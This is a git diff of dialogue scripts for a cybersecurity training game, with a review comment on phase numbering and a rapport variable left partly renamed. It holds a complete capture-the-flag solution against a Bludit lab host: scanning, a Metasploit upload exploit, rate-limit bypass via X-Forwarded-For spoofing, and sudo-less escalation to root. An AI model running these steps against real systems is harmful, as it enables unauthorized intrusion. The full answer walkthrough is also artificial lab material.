~ instructor_rapport += 5 + [How do I use Nikto?] - CTF Challenge Coordinator: Nikto scans for web vulnerabilities: nikto -h http://TARGET_IP + Haxolottle: Nikto scans for web vulnerabilities: nikto -h http://TARGET_IP - CTF Challenge Coordinator: It checks for over 6,000 security issues including dangerous files, server misconfigurations, and known vulnerabilities. + Haxolottle: It checks for over 6,000 security issues including dangerous files, server misconfigurations, and known vulnerabilities. - CTF Challenge Coordinator: The output shows each finding with references for more information. + Haxolottle: The output shows each finding with references for more information. - CTF Challenge Coordinator: Nikto results help you understand what attacks might be successful. + Haxolottle: Nikto results help you understand what attacks might be successful. ~ instructor_rapport += 5 + [How do I use OWASP ZAP?] - CTF Challenge Coordinator: OWASP ZAP acts as a proxy between your browser and the web server. + Haxolottle: OWASP ZAP acts as a proxy between your browser and the web server. - CTF Challenge Coordinator: It intercepts HTTP requests and responses, allowing you to modify and replay them. + Haxolottle: It intercepts HTTP requests and responses, allowing you to modify and replay them. - CTF Challenge Coordinator: This is incredibly useful for brute forcing login forms, especially those with CSRF protection. + Haxolottle: This is incredibly useful for brute forcing login forms, especially those with CSRF protection. - CTF Challenge Coordinator: You can also use it to bypass IP-based rate limiting with the X-Forwarded-For header. + Haxolottle: You can also use it to bypass IP-based rate limiting with the X-Forwarded-For header. ~ instructor_rapport += 5 - -> {challenge_mode == "ctf": ctf_mode_hub | guided_mode_hub} === phase_1_recon === -CTF Challenge Coordinator: Phase 1 is all about information gathering - discovering what you're dealing with before launching attacks. 
+Haxolottle: Phase 1 is all about information gathering - discovering what you're dealing with before launching attacks. ~ instructor_rapport += 5 -CTF Challenge Coordinator: The attack methodology follows this sequence: reconnaissance, scanning, exploitation, post-exploitation, and privilege escalation. +Haxolottle: The attack methodology follows this sequence: reconnaissance, scanning, exploitation, post-exploitation, and privilege escalation. -CTF Challenge Coordinator: Each phase builds on the previous, so thorough reconnaissance is crucial. +Haxolottle: Each phase builds on the previous, so thorough reconnaissance is crucial. + [What should I scan for?] - CTF Challenge Coordinator: Start with network reconnaissance: nmap -sV TARGET_IP + Haxolottle: Start with network reconnaissance: nmap -sV TARGET_IP - CTF Challenge Coordinator: This identifies open ports, running services, and software versions. + Haxolottle: This identifies open ports, running services, and software versions. - CTF Challenge Coordinator: Then scan the web application: dirb http://TARGET_IP + Haxolottle: Then scan the web application: dirb http://TARGET_IP - CTF Challenge Coordinator: Follow up with: nikto -h http://TARGET_IP + Haxolottle: Follow up with: nikto -h http://TARGET_IP - CTF Challenge Coordinator: Look for admin panels, configuration files, backup files, and anything that might contain credentials. + Haxolottle: Look for admin panels, configuration files, backup files, and anything that might contain credentials. ~ instructor_rapport += 5 + [What am I looking for specifically?] - CTF Challenge Coordinator: You're looking for several things: + Haxolottle: You're looking for several things: - CTF Challenge Coordinator: What CMS (Content Management System) is running? This tells you what exploits might work. + Haxolottle: What CMS (Content Management System) is running? This tells you what exploits might work. 
- CTF Challenge Coordinator: Are there leaked credentials in discovered files? Check text files, logs, and backups. + Haxolottle: Are there leaked credentials in discovered files? Check text files, logs, and backups. - CTF Challenge Coordinator: Is there an admin login page? You might need to access it. + Haxolottle: Is there an admin login page? You might need to access it. - CTF Challenge Coordinator: What server software and versions are running? This helps identify known vulnerabilities. + Haxolottle: What server software and versions are running? This helps identify known vulnerabilities. - CTF Challenge Coordinator: There's also a flag hidden in one of the discovered files! + Haxolottle: There's also a flag hidden in one of the discovered files! ~ instructor_rapport += 5 + [Walk me through the reconnaissance process] - CTF Challenge Coordinator: Here's the step-by-step process: + Haxolottle: Here's the step-by-step process: - CTF Challenge Coordinator: 1. Run Nmap: nmap -sV -p- TARGET_IP (scan all ports with version detection) + Haxolottle: 1. Run Nmap: nmap -sV -p- TARGET_IP (scan all ports with version detection) - CTF Challenge Coordinator: 2. Run Dirb: dirb http://TARGET_IP (find hidden directories and files) + Haxolottle: 2. Run Dirb: dirb http://TARGET_IP (find hidden directories and files) - CTF Challenge Coordinator: 3. Run Nikto: nikto -h http://TARGET_IP (identify web vulnerabilities) + Haxolottle: 3. Run Nikto: nikto -h http://TARGET_IP (identify web vulnerabilities) - CTF Challenge Coordinator: 4. Browse discovered URLs - open them in Firefox to see what they contain + Haxolottle: 4. Browse discovered URLs - open them in Firefox to see what they contain - CTF Challenge Coordinator: 5. Look for patterns: usernames on the website, admin pages, leaked files + Haxolottle: 5. Look for patterns: usernames on the website, admin pages, leaked files - CTF Challenge Coordinator: 6. 
Document everything - the CMS name, discovered usernames, any found credentials + Haxolottle: 6. Document everything - the CMS name, discovered usernames, any found credentials - CTF Challenge Coordinator: The reconnaissance might reveal Bludit CMS with an admin login at /admin/ + Haxolottle: The reconnaissance might reveal Bludit CMS with an admin login at /admin/ ~ instructor_rapport += 5 - -> guided_mode_hub === phase_2_exploitation === -CTF Challenge Coordinator: Phase 2 is exploitation - using discovered vulnerabilities to gain access. +Haxolottle: Phase 2 is exploitation - using discovered vulnerabilities to gain access. ~ instructor_rapport += 5 -CTF Challenge Coordinator: Based on your reconnaissance, you should have identified Bludit CMS running on the server. +Haxolottle: Based on your reconnaissance, you should have identified Bludit CMS running on the server. -CTF Challenge Coordinator: Bludit has known vulnerabilities that we can exploit using Metasploit. +Haxolottle: Bludit has known vulnerabilities that we can exploit using Metasploit. + [How do I find Bludit exploits?] - CTF Challenge Coordinator: In Metasploit, search for Bludit: search bludit + Haxolottle: In Metasploit, search for Bludit: search bludit - CTF Challenge Coordinator: You'll find several modules. Look for ones related to code execution or file upload. + Haxolottle: You'll find several modules. Look for ones related to code execution or file upload. - CTF Challenge Coordinator: Use info to read about each exploit: info exploit/linux/http/bludit_upload_images_exec + Haxolottle: Use info to read about each exploit: info exploit/linux/http/bludit_upload_images_exec - CTF Challenge Coordinator: This particular exploit allows arbitrary code execution through image upload functionality. + Haxolottle: This particular exploit allows arbitrary code execution through image upload functionality. ~ instructor_rapport += 5 + [What do I need to exploit Bludit?] 
- CTF Challenge Coordinator: The Bludit exploit requires several pieces of information: + Haxolottle: The Bludit exploit requires several pieces of information: - CTF Challenge Coordinator: RHOSTS: The target IP address + Haxolottle: RHOSTS: The target IP address - CTF Challenge Coordinator: BLUDITUSER: The Bludit admin username (should have been discovered during recon) + Haxolottle: BLUDITUSER: The Bludit admin username (should have been discovered during recon) - CTF Challenge Coordinator: BLUDITPASS: The admin password (might have been leaked, or you'll need to brute force it) + Haxolottle: BLUDITPASS: The admin password (might have been leaked, or you'll need to brute force it) - CTF Challenge Coordinator: TARGETURI: Typically / (the root of the web server) + Haxolottle: TARGETURI: Typically / (the root of the web server) - CTF Challenge Coordinator: The exploit will give you a Meterpreter shell if successful! + Haxolottle: The exploit will give you a Meterpreter shell if successful! ~ instructor_rapport += 5 + [What if I don't have the password?] 
- CTF Challenge Coordinator: If you found the username but not the password, you have options: + Haxolottle: If you found the username but not the password, you have options: - CTF Challenge Coordinator: Check all discovered files thoroughly - passwords are sometimes leaked in config files or backups + Haxolottle: Check all discovered files thoroughly - passwords are sometimes leaked in config files or backups - CTF Challenge Coordinator: If truly not found, you can brute force it using OWASP ZAP (covered in optional Phase 3) + Haxolottle: If truly not found, you can brute force it using OWASP ZAP (covered in optional Phase 3) - CTF Challenge Coordinator: Bludit has CSRF protection and rate limiting, making brute forcing tricky but possible + Haxolottle: Bludit has CSRF protection and rate limiting, making brute forcing tricky but possible ~ instructor_rapport += 5 + [Walk me through the exploitation] - CTF Challenge Coordinator: Here's the complete exploitation process: + Haxolottle: Here's the complete exploitation process: - CTF Challenge Coordinator: 1. Start Metasploit: msfconsole + Haxolottle: 1. Start Metasploit: msfconsole - CTF Challenge Coordinator: 2. Search: search bludit + Haxolottle: 2. Search: search bludit - CTF Challenge Coordinator: 3. Use the upload_images exploit: use exploit/linux/http/bludit_upload_images_exec + Haxolottle: 3. Use the upload_images exploit: use exploit/linux/http/bludit_upload_images_exec - CTF Challenge Coordinator: 4. Show options: show options + Haxolottle: 4. Show options: show options - CTF Challenge Coordinator: 5. Set target: set RHOSTS TARGET_IP + Haxolottle: 5. Set target: set RHOSTS TARGET_IP - CTF Challenge Coordinator: 6. Set username: set BLUDITUSER admin (or discovered username) + Haxolottle: 6. Set username: set BLUDITUSER admin (or discovered username) - CTF Challenge Coordinator: 7. Set password: set BLUDITPASS + Haxolottle: 7. Set password: set BLUDITPASS - CTF Challenge Coordinator: 8. 
Run exploit: exploit + Haxolottle: 8. Run exploit: exploit - CTF Challenge Coordinator: If successful, you'll get a Meterpreter shell! This is your foothold in the system. + Haxolottle: If successful, you'll get a Meterpreter shell! This is your foothold in the system. ~ instructor_rapport += 5 - -> guided_mode_hub === phase_3_bruteforce === -CTF Challenge Coordinator: Phase 3 is optional - brute forcing the Bludit password if you only have the username. +Haxolottle: Phase 3 is optional - brute forcing the Bludit password if you only have the username. ~ instructor_rapport += 5 -CTF Challenge Coordinator: Bludit has protections against brute forcing: CSRF tokens and IP-based rate limiting. +Haxolottle: Bludit has protections against brute forcing: CSRF tokens and IP-based rate limiting. -CTF Challenge Coordinator: OWASP ZAP can bypass these protections with the right configuration. +Haxolottle: OWASP ZAP can bypass these protections with the right configuration. + [How does CSRF protection work?] - CTF Challenge Coordinator: CSRF (Cross-Site Request Forgery) tokens are randomly generated by the server. + Haxolottle: CSRF (Cross-Site Request Forgery) tokens are randomly generated by the server. - CTF Challenge Coordinator: The server sends a token in each response, and the client must include it in the next request. + Haxolottle: The server sends a token in each response, and the client must include it in the next request. - CTF Challenge Coordinator: This prevents simple replay attacks because each request needs the current token. + Haxolottle: This prevents simple replay attacks because each request needs the current token. - CTF Challenge Coordinator: OWASP ZAP can extract tokens from responses and insert them into requests automatically. + Haxolottle: OWASP ZAP can extract tokens from responses and insert them into requests automatically. ~ instructor_rapport += 5 + [How does rate limiting protection work?] 
- CTF Challenge Coordinator: After a certain number of failed login attempts from the same IP, Bludit blocks that IP temporarily. + Haxolottle: After a certain number of failed login attempts from the same IP, Bludit blocks that IP temporarily. - CTF Challenge Coordinator: You'll see messages like "Too many incorrect attempts. Try again in 30 minutes." + Haxolottle: You'll see messages like "Too many incorrect attempts. Try again in 30 minutes." - CTF Challenge Coordinator: However, we can bypass this using the X-Forwarded-For HTTP header. + Haxolottle: However, we can bypass this using the X-Forwarded-For HTTP header. - CTF Challenge Coordinator: By randomizing the X-Forwarded-For IP, we make each attempt appear to come from a different client. + Haxolottle: By randomizing the X-Forwarded-For IP, we make each attempt appear to come from a different client. ~ instructor_rapport += 5 + [Walk me through the ZAP brute force process] - CTF Challenge Coordinator: This is complex, so pay attention: + Haxolottle: This is complex, so pay attention: - CTF Challenge Coordinator: 1. Launch OWASP ZAP and configure it as a proxy + Haxolottle: 1. Launch OWASP ZAP and configure it as a proxy - CTF Challenge Coordinator: 2. Install the random_x_forwarded_for_ip.js script from the ZAP community scripts + Haxolottle: 2. Install the random_x_forwarded_for_ip.js script from the ZAP community scripts - CTF Challenge Coordinator: 3. Browse to the Bludit login page through ZAP + Haxolottle: 3. Browse to the Bludit login page through ZAP - CTF Challenge Coordinator: 4. Attempt a login to capture the HTTP request in ZAP's history + Haxolottle: 4. Attempt a login to capture the HTTP request in ZAP's history - CTF Challenge Coordinator: 5. Right-click the POST request and select "Fuzz..." + Haxolottle: 5. Right-click the POST request and select "Fuzz..." - CTF Challenge Coordinator: 6. Select the password field and add a payload with common passwords + Haxolottle: 6. 
Select the password field and add a payload with common passwords - CTF Challenge Coordinator: 7. Add the X-Forwarded-For script as a message processor + Haxolottle: 7. Add the X-Forwarded-For script as a message processor - CTF Challenge Coordinator: 8. Launch the fuzzer and look for different HTTP response codes + Haxolottle: 8. Launch the fuzzer and look for different HTTP response codes - CTF Challenge Coordinator: Successful logins typically return 301 or 302 (redirect) instead of 200 (error message). + Haxolottle: Successful logins typically return 301 or 302 (redirect) instead of 200 (error message). ~ instructor_rapport += 5 - -> guided_mode_hub === phase_4_post_exploit === -CTF Challenge Coordinator: Phase 4 is post-exploitation - exploring the compromised system and hunting for flags. +Haxolottle: Phase 4 is post-exploitation - exploring the compromised system and hunting for flags. ~ instructor_rapport += 5 -CTF Challenge Coordinator: You should have a Meterpreter shell from the exploitation phase. +Haxolottle: You should have a Meterpreter shell from the exploitation phase. -CTF Challenge Coordinator: Now it's time to explore the system, understand your access level, and find flags. +Haxolottle: Now it's time to explore the system, understand your access level, and find flags. + [What Meterpreter commands should I use?] - CTF Challenge Coordinator: Essential Meterpreter commands for exploration: + Haxolottle: Essential Meterpreter commands for exploration: - CTF Challenge Coordinator: getuid - Shows your current username + Haxolottle: getuid - Shows your current username - CTF Challenge Coordinator: sysinfo - System information (OS, architecture, etc.) + Haxolottle: sysinfo - System information (OS, architecture, etc.) 
- CTF Challenge Coordinator: pwd - Print working directory + Haxolottle: pwd - Print working directory - CTF Challenge Coordinator: ls - List files in current directory + Haxolottle: ls - List files in current directory - CTF Challenge Coordinator: cat filename - Read file contents + Haxolottle: cat filename - Read file contents - CTF Challenge Coordinator: cd /path - Change directory + Haxolottle: cd /path - Change directory - CTF Challenge Coordinator: shell - Drop to OS shell (Ctrl-C to return to Meterpreter) + Haxolottle: shell - Drop to OS shell (Ctrl-C to return to Meterpreter) ~ instructor_rapport += 5 + [Where should I look for flags?] - CTF Challenge Coordinator: Flags are hidden in various locations: + Haxolottle: Flags are hidden in various locations: - CTF Challenge Coordinator: Check your current directory - there might be a flag right where you land + Haxolottle: Check your current directory - there might be a flag right where you land - CTF Challenge Coordinator: Look in user home directories: /home/username/ + Haxolottle: Look in user home directories: /home/username/ - CTF Challenge Coordinator: Different users might have different flags + Haxolottle: Different users might have different flags - CTF Challenge Coordinator: Eventually, you'll need to check /root/ but that requires privilege escalation + Haxolottle: Eventually, you'll need to check /root/ but that requires privilege escalation - CTF Challenge Coordinator: Some flags might be in encrypted files - note encryption hints for later + Haxolottle: Some flags might be in encrypted files - note encryption hints for later ~ instructor_rapport += 5 + [How do I switch users?] - CTF Challenge Coordinator: To switch users, you need to drop to an OS shell first: + Haxolottle: To switch users, you need to drop to an OS shell first: - CTF Challenge Coordinator: From Meterpreter, run: shell + Haxolottle: From Meterpreter, run: shell - CTF Challenge Coordinator: Now you have a Linux shell. 
Use: su username + Haxolottle: Now you have a Linux shell. Use: su username - CTF Challenge Coordinator: However, you'll need the user's password to switch + Haxolottle: However, you'll need the user's password to switch - CTF Challenge Coordinator: If you discovered the Bludit admin user's password earlier, you can switch to that user + Haxolottle: If you discovered the Bludit admin user's password earlier, you can switch to that user - CTF Challenge Coordinator: Return to Meterpreter with Ctrl-C when done + Haxolottle: Return to Meterpreter with Ctrl-C when done ~ instructor_rapport += 5 - -> guided_mode_hub === phase_5_privesc === -CTF Challenge Coordinator: Phase 5 is privilege escalation - gaining root access to fully control the system. +Haxolottle: Phase 5 is privilege escalation - gaining root access to fully control the system. ~ instructor_rapport += 5 -CTF Challenge Coordinator: Your initial shell is likely running as the www-data user (the web server user) with limited privileges. +Haxolottle: Your initial shell is likely running as the www-data user (the web server user) with limited privileges. -CTF Challenge Coordinator: To access all system files and read flags in /root/, you need to escalate to root. +Haxolottle: To access all system files and read flags in /root/, you need to escalate to root. + [How do I check my privileges?] 
- CTF Challenge Coordinator: From a shell, check your privileges: + Haxolottle: From a shell, check your privileges: - CTF Challenge Coordinator: whoami - Shows your username + Haxolottle: whoami - Shows your username - CTF Challenge Coordinator: id - Shows UID, GID, and groups + Haxolottle: id - Shows UID, GID, and groups - CTF Challenge Coordinator: sudo -l - Lists commands you can run with sudo + Haxolottle: sudo -l - Lists commands you can run with sudo - CTF Challenge Coordinator: Note: You might need a proper TTY terminal first: python3 -c 'import pty; pty.spawn("/bin/bash")' + Haxolottle: Note: You might need a proper TTY terminal first: python3 -c 'import pty; pty.spawn("/bin/bash")' - CTF Challenge Coordinator: This spawns a proper terminal that sudo will accept. + Haxolottle: This spawns a proper terminal that sudo will accept. ~ instructor_rapport += 5 + [What's the sudo privilege escalation method?] - CTF Challenge Coordinator: When you run sudo -l, you'll see what commands you can run as root. + Haxolottle: When you run sudo -l, you'll see what commands you can run as root. - CTF Challenge Coordinator: If you can run /usr/bin/less with sudo, that's your ticket to root! + Haxolottle: If you can run /usr/bin/less with sudo, that's your ticket to root! - CTF Challenge Coordinator: The 'less' command is a pager for viewing files, but it can also execute shell commands. + Haxolottle: The 'less' command is a pager for viewing files, but it can also execute shell commands. - CTF Challenge Coordinator: When viewing a file with less, press ! followed by a command to execute it. + Haxolottle: When viewing a file with less, press ! followed by a command to execute it. - CTF Challenge Coordinator: Since less is running with sudo privileges, any command you run will execute as root! + Haxolottle: Since less is running with sudo privileges, any command you run will execute as root! 
~ instructor_rapport += 5 + [Walk me through getting root access] - CTF Challenge Coordinator: Here's the complete privilege escalation process: + Haxolottle: Here's the complete privilege escalation process: - CTF Challenge Coordinator: 1. Drop to shell from Meterpreter: shell + Haxolottle: 1. Drop to shell from Meterpreter: shell - CTF Challenge Coordinator: 2. Spawn a proper terminal: python3 -c 'import pty; pty.spawn("/bin/bash")' + Haxolottle: 2. Spawn a proper terminal: python3 -c 'import pty; pty.spawn("/bin/bash")' - CTF Challenge Coordinator: 3. Check sudo permissions: sudo -l + Haxolottle: 3. Check sudo permissions: sudo -l - CTF Challenge Coordinator: 4. You should see you can run less on a specific file + Haxolottle: 4. You should see you can run less on a specific file - CTF Challenge Coordinator: 5. Run that command with sudo: sudo /usr/bin/less /path/to/file + Haxolottle: 5. Run that command with sudo: sudo /usr/bin/less /path/to/file - CTF Challenge Coordinator: 6. When the file is displayed, type: !id + Haxolottle: 6. When the file is displayed, type: !id - CTF Challenge Coordinator: 7. You should see uid=0 (root!) in the output + Haxolottle: 7. You should see uid=0 (root!) in the output - CTF Challenge Coordinator: 8. Now type: !/bin/bash + Haxolottle: 8. Now type: !/bin/bash - CTF Challenge Coordinator: 9. You now have a root shell! Verify with: whoami + Haxolottle: 9. You now have a root shell! Verify with: whoami - CTF Challenge Coordinator: Now you can access /root/ and find the final flags! + Haxolottle: Now you can access /root/ and find the final flags! 
~ instructor_rapport += 5 - -> guided_mode_hub === complete_walkthrough === -CTF Challenge Coordinator: Here's the complete solution walkthrough from start to finish: +Haxolottle: Here's the complete solution walkthrough from start to finish: ~ instructor_rapport += 10 ~ ctf_mastery += 20 -CTF Challenge Coordinator: **Phase 1 - Reconnaissance:** +Haxolottle: **Phase 1 - Reconnaissance:** -CTF Challenge Coordinator: nmap -sV -p- TARGET_IP +Haxolottle: nmap -sV -p- TARGET_IP -CTF Challenge Coordinator: dirb http://TARGET_IP +Haxolottle: dirb http://TARGET_IP -CTF Challenge Coordinator: nikto -h http://TARGET_IP +Haxolottle: nikto -h http://TARGET_IP -CTF Challenge Coordinator: Browse discovered files, find admin login at /admin/, discover Bludit CMS, find leaked credentials +Haxolottle: Browse discovered files, find admin login at /admin/, discover Bludit CMS, find leaked credentials -CTF Challenge Coordinator: **Phase 2 - Exploitation:** +Haxolottle: **Phase 2 - Exploitation:** -CTF Challenge Coordinator: msfconsole +Haxolottle: msfconsole -CTF Challenge Coordinator: search bludit +Haxolottle: search bludit -CTF Challenge Coordinator: use exploit/linux/http/bludit_upload_images_exec +Haxolottle: use exploit/linux/http/bludit_upload_images_exec -CTF Challenge Coordinator: set RHOSTS TARGET_IP +Haxolottle: set RHOSTS TARGET_IP -CTF Challenge Coordinator: set BLUDITUSER admin (or discovered username) +Haxolottle: set BLUDITUSER admin (or discovered username) -CTF Challenge Coordinator: set BLUDITPASS discovered_password +Haxolottle: set BLUDITPASS discovered_password -CTF Challenge Coordinator: exploit +Haxolottle: exploit -CTF Challenge Coordinator: **Phase 3 - Post-Exploitation:** +Haxolottle: **Phase 3 - Post-Exploitation:** -CTF Challenge Coordinator: getuid, sysinfo, ls, cat flag.txt (in current directory) +Haxolottle: getuid, sysinfo, ls, cat flag.txt (in current directory) -CTF Challenge Coordinator: shell +Haxolottle: shell -CTF Challenge Coordinator: su 
bludit_admin (with discovered password) +Haxolottle: su bludit_admin (with discovered password) -CTF Challenge Coordinator: cat ~/flag.txt (in that user's home) +Haxolottle: cat ~/flag.txt (in that user's home) -CTF Challenge Coordinator: **Phase 4 - Privilege Escalation:** +Haxolottle: **Phase 4 - Privilege Escalation:** -CTF Challenge Coordinator: python3 -c 'import pty; pty.spawn("/bin/bash")' +Haxolottle: python3 -c 'import pty; pty.spawn("/bin/bash")' -CTF Challenge Coordinator: sudo -l (discover you can run less on a specific file) +Haxolottle: sudo -l (discover you can run less on a specific file) -CTF Challenge Coordinator: sudo /usr/bin/less /path/to/file +Haxolottle: sudo /usr/bin/less /path/to/file -CTF Challenge Coordinator: !id (verify root) +Haxolottle: !id (verify root) -CTF Challenge Coordinator: !/bin/bash (spawn root shell) +Haxolottle: !/bin/bash (spawn root shell) -CTF Challenge Coordinator: cd /root && ls (find final flags) +Haxolottle: cd /root && ls (find final flags) -CTF Challenge Coordinator: That's the complete solution! Try to replicate it yourself now that you understand the approach. +Haxolottle: That's the complete solution! Try to replicate it yourself now that you understand the approach. -> guided_mode_hub diff --git a/story_design/ink/game_scenarios/phishing_social_engineering.ink b/story_design/ink/game_scenarios/phishing_social_engineering.ink index fc690ef..a49cba2 100644 --- a/story_design/ink/game_scenarios/phishing_social_engineering.ink +++ b/story_design/ink/game_scenarios/phishing_social_engineering.ink @@ -32,7 +32,7 @@ VAR completed_spoofing = false VAR completed_attachment = false // Instructor relationship -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 VAR ethical_awareness_shown = false // External variables 
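Review bot: the phase numbering in `complete_walkthrough` disagrees with the knots it summarises: the walkthrough labels post-exploitation `**Phase 3 - Post-Exploitation:**` and privilege escalation `**Phase 4 - Privilege Escalation:**`, while the guided-mode knots are `phase_3_bruteforce`, `phase_4_post_exploit` and `phase_5_privesc`, and `phase_2_exploitation` tells the player that brute forcing is "covered in optional Phase 3". Since this hunk already rewrites every speaker line in the walkthrough, renumber the headings to match the knots (Phase 3 brute force, Phase 4 post-exploitation, Phase 5 privilege escalation) or drop the numbers in the walkthrough, so a player who switches between guided mode and the walkthrough is not told two different phase sequences. The `~ instructor_rapport += 5` and `~ instructor_rapport += 10` increments throughout this hunk are also left unrenamed while the `VAR instructor_rapport = 0` declaration in the phishing_social_engineering.ink hunk that follows is changed to `VAR haxolottle_rapport = 0`, so the two files end up on different rapport variable names.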
@@ -43,7 +43,7 @@ EXTERNAL player_name // =========================================== === start === -~ instructor_rapport = 0 +~ haxolottle_rapport = 0 Social Engineering Specialist: Welcome, Agent {player_name}. I'm your instructor for human factors and social engineering. @@ -55,12 +55,12 @@ Social Engineering Specialist: Clear on that? We're learning these techniques to * [Absolutely. I understand the ethical boundaries] ~ ethical_awareness_shown = true - ~ instructor_rapport += 15 + ~ haxolottle_rapport += 15 You: Understood completely. Authorized testing only, controlled environments, defensive purpose. Social Engineering Specialist: Perfect. That's exactly the mindset we need. Let's begin. -> social_engineering_hub * [Yes, I'm clear on the scope] - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 You: Clear on the ethical constraints. Social Engineering Specialist: Good. Remember that throughout. -> social_engineering_hub @@ -102,7 +102,7 @@ Social Engineering Specialist: What aspect of social engineering and phishing wo === human_factors_intro === ~ intro_human_factors_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Human factors. The foundation of social engineering attacks. @@ -123,7 +123,7 @@ Social Engineering Specialist: The classic saying: "The user is the weakest link -> social_engineering_hub === human_vulnerabilities === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Excellent question. Multiple factors make humans vulnerable: 
@@ -137,11 +137,11 @@ Social Engineering Specialist: **Information asymmetry**: Attackers know tricks Social Engineering Specialist: **Scale**: Attackers can send thousands of phishing emails. They only need one person to click. The defender has to get it right every time. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -> social_engineering_hub === human_factors_defense === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Good instinct. Defense requires layered approaches: @@ -155,7 +155,7 @@ Social Engineering Specialist: **Culture**: Create organizational culture where Social Engineering Specialist: **Regular testing**: Conduct simulated phishing campaigns to identify vulnerable users and improve training. What we're doing here—authorized, controlled testing. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub // =========================================== @@ -164,7 +164,7 @@ Social Engineering Specialist: **Regular testing**: Conduct simulated phishing c === phishing_basics === ~ phishing_basics_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Phishing. One of the most effective attack vectors in cybersecurity. @@ -191,7 +191,7 @@ Social Engineering Specialist: Once they open that attachment, the attacker gain -> social_engineering_hub === spear_phishing_explanation === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Important distinction. 
@@ -205,11 +205,11 @@ Social Engineering Specialist: This lab simulates spear phishing. You'll researc Social Engineering Specialist: In real-world APT (Advanced Persistent Threat) attacks, spear phishing is often the initial compromise. High-value targets get carefully researched, precisely targeted emails. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === phishing_success_rates === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: Disturbingly successful. @@ -226,11 +226,11 @@ Social Engineering Specialist: The economics favor attackers: sending 10,000 phi Social Engineering Specialist: And one successful compromise can be enough. One executive's email account, one developer's credentials, one system admin's access—that's your foothold. -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -> social_engineering_hub === convincing_phishing === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: The art of the convincing phish. Several key elements: @@ -248,7 +248,7 @@ Social Engineering Specialist: **Psychological triggers**: Authority (from execu Social Engineering Specialist: Combine these elements, and you create emails that even security-aware users might trust. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub // =========================================== @@ -257,7 +257,7 @@ Social Engineering Specialist: Combine these elements, and you create emails tha === reconnaissance_intro === ~ reconnaissance_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Reconnaissance. The foundation of targeted attacks. 
@@ -284,7 +284,7 @@ Social Engineering Specialist: **Interest identification**: What are targets pas -> social_engineering_hub === recon_timeframes === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: Depends on the operation and target value. @@ -298,12 +298,12 @@ Social Engineering Specialist: The more valuable the target, the more reconnaiss Social Engineering Specialist: For this lab, you'll spend 15-30 minutes on reconnaissance. Enough to understand the organization and personalize attacks, but compressed for training purposes. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 ~ completed_reconnaissance = true -> social_engineering_hub === osint_tools === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Many tools assist OSINT: @@ -323,7 +323,7 @@ Social Engineering Specialist: **Shodan**: Search engine for internet-connected Social Engineering Specialist: For this exercise, you'll manually browse the target website. Simple, but effective for understanding the process. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_reconnaissance = true -> social_engineering_hub @@ -333,7 +333,7 @@ Social Engineering Specialist: For this exercise, you'll manually browse the tar === email_spoofing_intro === ~ email_spoofing_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Email spoofing. Fundamental to convincing phishing. @@ -359,7 +359,7 @@ Social Engineering Specialist: Modern defenses exist: SPF, DKIM, DMARC—technol -> social_engineering_hub === email_authentication === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Good question. Email authentication mechanisms: 
@@ -373,11 +373,11 @@ Social Engineering Specialist: When properly implemented, these make spoofing mu Social Engineering Specialist: Many organizations haven't configured DMARC. Many email servers don't strictly enforce these policies. Spoofing remains viable in many scenarios. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === spoofing_technique === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: In this lab, spoofing is straightforward. @@ -393,11 +393,11 @@ Social Engineering Specialist: Other spoofing approaches: Social Engineering Specialist: The simulation simplifies this to focus on social engineering tactics rather than technical bypasses. ~ completed_spoofing = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -> social_engineering_hub === email_design_problems === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Excellent critical thinking. @@ -415,7 +415,7 @@ Social Engineering Specialist: Classic security challenge: replacing widely-depl Social Engineering Specialist: Lesson: technical debt and legacy systems create enduring vulnerabilities. Design security in from the start, because retrofitting is painful. -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 -> social_engineering_hub // =========================================== @@ -424,7 +424,7 @@ Social Engineering Specialist: Lesson: technical debt and legacy systems create === malicious_attachments_intro === ~ malicious_attachments_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Malicious attachments. The payload delivery mechanism. 
